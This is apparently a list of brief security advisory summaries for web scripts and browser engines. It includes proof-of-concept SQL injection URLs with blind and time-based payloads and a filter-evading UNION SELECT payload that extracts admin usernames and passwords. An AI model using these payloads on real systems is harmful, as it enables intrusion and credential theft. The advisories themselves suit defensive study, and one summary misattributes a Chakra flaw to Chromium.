SQL injection on [detail] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/detail/xx AND 1053=1053/xxxxx Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: AND 1053=1053/xxxx Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: AND SLEEP(5)/xxxx
SQL injection on [sid] parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/single_detail.php?sid=9 AND 5028=5028 Parameter: sid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=9 AND 5028=5028 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: sid=9 AND SLEEP(5)
The vulnerability allows an users upload arbitrary file. The vulnerability exists due to insufficient validation of the file extension and file type in the 'imageSubmit' and 'proof_submit' functions in the 'UserController.php' script. A remote attacker can upload arbitrary files, including malicious PHP files, to compromise the web application.
A SQL injection vulnerability exists in Cash Back Comparison Script 1.0. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.
The vulnerability allows an attacker to inject sql commands. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/single-cause.php?pid=[SQL] -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+- Etc..
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
Stock Photo Selling Script 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the admin credentials of the application.
This vulnerability is related to the Chromium browser. It occurs when the JavascriptFunction::ReparseAsmJsModule() function is used to re-parse an asmjs module. The function resets the function body and then re-parses it, but it does not consider that the functionInfo->Parse(functionRef) may throw an exception. This can be exploited by exhausting the stack and then calling the Module() function with an argument, which will cause an exception to be thrown and the function body to remain reseted.
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. There is a bug when it parses 'eval' in a catch statement's param. The parser creates a temporary block used to create a scope, but it is not actually inserted into the AST. If the parser meets 'eval' in 'ParseDestructuredLiteral', it calls 'pnodeCatchScope->SetCallsEval'. But 'pnodeCatchScope' is not inserted into the AST. So the bytecode generator doesn't know it calls 'eval', and it can't create scopes properly.
Services By CQR